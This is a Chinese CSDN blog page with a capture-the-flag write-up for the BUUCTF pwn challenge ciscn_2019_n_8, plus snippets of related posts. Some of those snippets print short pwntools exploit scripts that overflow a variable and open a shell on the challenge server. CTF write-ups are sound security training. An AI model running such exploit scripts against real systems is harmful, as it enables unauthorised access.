ciscn_2019_n_8 buuctf

最新推荐文章于 2024-04-14 22:13:54 发布

N1nEmAn

最新推荐文章于 2024-04-14 22:13:54 发布

阅读量644

点赞数 1

文章标签：安全

本文链接：https://blog.csdn.net/XDiku/article/details/128746843

版权

2023-01-21 WP

0x00 T2 ciscn_2019_n_8

祝大家除夕快乐！
题目来源是buuctf pwn的第9题，ciscn_2019_n_8。

0x01 wp

第一步，checksec

在这里插入图片描述

非常可怕！32位，什么都开了，一开始还以为要寄了，结果发现其实并没有那么难

第二步，反编译+静态分析

在这里插入图片描述
可以看出利用的是格式化字符串的漏洞，需要我们修改var地址往下数第十四个，类似是数组的结构到var[13]为17，并且为LL就是long long int八个字节，，相当于64位的数据'\x11\x00\x00\x00\x00\x00\x00\x00'。

第三步，写exp

在这里插入图片描述 var数组可以看做是一个int型的数组，先用aaaa填充前面的数据，最后写入64位形式的17。

最后一步，运行拿到flag

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

N1nEmAn

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
1
评论
ciscn_2019_n_8 buuctf

ciscn_2019_n_8
复制链接

扫一扫

[buuctf]ciscn_2019_n_8

逆向萌新的博客

06-19

444

[buuctf]ciscn_2019_n_8

ctf【ciscn_2019_n_8】

HUANGliang_的博客

10-29

254

缓冲区溢出漏洞

1 条评论您还未登录，请先登录后发表或查看评论

ciscn_2019_n_8【BUUCTF】

qq_41696518的博客

08-26

332

ciscn_2019_n_8

ciscn_2019_n_8题解

OrientalGlass的博客

01-08

243

是以&var[13]为起始地址的八个内存单元,由于是小端存储,所以覆盖要使得v[13]=0,v[14]=17。很显然输入字符串覆盖var数组里的值满足要求即可。1.checksec查看,保护全开感觉不妙。3.程序逻辑并不复杂,脚本很简单。2.ida打开查看程序。

ciscn_2019_n_8

xieyichensss的博客

04-07

500

最近做题好少啊，感觉堆好难啊。废话不多说了，这是我做过的挺简单的一个题了。 1.拿到文件，直接file，发现保护基本全开，心里一凉，然后拖入ida。 2.发现是个很简单的栈溢出，如果var数组的第14个参数为0x11，即可调用system（’/bin/sh’）。而又有scanf函数，且第一个参数为var数组的首地址。 3.exp from pwn import * context.os=‘linux’ context.arch=‘i386’ context.log_level=‘debug’ #sla=

ciscn_2019_n_3

12-30

ciscn(全国大学生信息安全竞赛)，2019年的一道题目，涉及到fastbin堆漏洞的利用。由于调用了system函数，所以漏洞利用的难度不大，推荐初学者练习。题解链接：...

ciscn_2021_silverwolf.zip

05-18

2021第十四届全国大学生信息安全竞赛pwn题。

ciscn_2021_game

06-23

2021年国赛的pwn题，虚拟机类型的题目，分析起来比较有难度。

ciscn-2019-pwn

11-29

【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题，尤其聚焦于"Pwn"类别，这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN（中国互联网安全大会）可能是这个挑战的背景，它是一个汇集...

ciscn_2021_lonelywolf.zip

05-17

【标题解析】：“ciscn_2021_lonelywolf.zip”这个文件名暗示了这是一个与2021年全国大学生信息安全竞赛相关的资源，其中“ciscn”可能代表了“Chinese Internet Security Contest”，而“lonelywolf”可能是该竞赛...

BUUCTF ciscn_2019_n_8

、moddemod

06-11

381

exp from pwn import * context.log_level = 'debug' proc_name = './ciscn_2019_n_8' p = remote('node3.buuoj.cn', 26801) # p = process(proc_name) payload = 'a'.encode() * 13 * 4 + p64(17) p.sendline(payload) p.interactive()

BUUCTF-PWN-ciscn_2019_n_8

Henlenl的博客

05-18

218

文章目录查看文件信息IDA 分析exp 查看文件信息 checksec 一下,保护还开的挺满 canary(栈保护)，nx(堆栈不可执行)，PIE(地址随机化) IDA 分析其实我们应该nc 连一下的查看远程程序运行情况丢入 32位IDA分析一下很显然程序的意思就是让 var[13] == 17就能拿到shell了 exp from pwn import * r = remote('node3.buuoj.cn',27168) #r = process('./ciscn_2019_n_8')

buuctf——ciscn_2019_n_8

qq_41560595的博客

03-21

534

查看权限开了好多权限查看源代码分析观察，var数组是int类型，在内存中占了4个字节。输入一个字符串，令var[13]处的值是17，且这个值占4个字节，就能拿到shell。 var中每一个元素占4个字节，payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节，就要用p64打包。解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*

buuctf之ciscn_2019_n_8

weixin_54452942的博客

04-12

496

两个方法解题

[BUUCTF] ciscn_2019_n_8

最新发布

Lucien_Carr的博客

04-14

246

这道题非常简单（甚至比ret2text简单...），只需要满足让系统调用system函数的条件，即将var[13]这个数组里全部填上17即可。checksec --file='filename' # filename为下载文件的自定义名称。观察选择条件，只需要满足var[13] = 17就可以。前面有scanf函数，可以直接向var数组输入。开了canary、NX和PIE，似乎防得很严实。主函数里就调用了system函数，运气很好。32位程序，放到IDA中继续分析。攻击成功，运行结果如下。

[BUUCTF]PWN13——ciscn_2019_n_8

mcmuyanga的博客

08-29

552

[BUUCTF]PWN13——ciscn_2019_n_8 题目网址：https://buuoj.cn/challenges#ciscn_2019_n_8 步骤：例行检查，32位，保护开的挺多，canary（栈保护），nx（堆栈不可执行），PIE（地址随机化） nc一下，看看程序大概的执行情况 32位ida载入，shift+f12查看程序里的字符串，看到了system和bin/sh 双击跟进，ctrl+x查看哪里调用了这个字符串很简单的一个程序，一开始让我们输入name，之后只要var[13]=

BUUCTF Pwn ciscn_2019_n_8 1

MrTreebook的博客

12-05

871

ciscn_2019_n_8 11.题目下载地址2.checksec检查保护3.IDA分析4.exp 1.题目下载地址点击下载题目 2.checksec检查保护所有保护全开，现在也不知道有什么办法试着运行一下，可能又是canary绕过 3.IDA分析 init(); puts("What's your name?"); __isoc99_scanf("%s", var, v4, v5); if ( *(_QWORD *)&var[13] ) { if ( *(_

BUUCTF pwn——ciscn_2019_n_8

CNS-Enterprise BCC-1701-J

03-15

152

BUUCTF 做题练习

ciscn_2019_c_1

09-12

根据您提供的引用内容和，题目"ciscn_2019_c_1"是一个涉及到fastbin堆漏洞利用的题目。fastbin是一个堆区的数据结构，用于存储小于等于64字节的空闲块。这个题目的漏洞利用难度不大，适合初学者练习。根据的代码...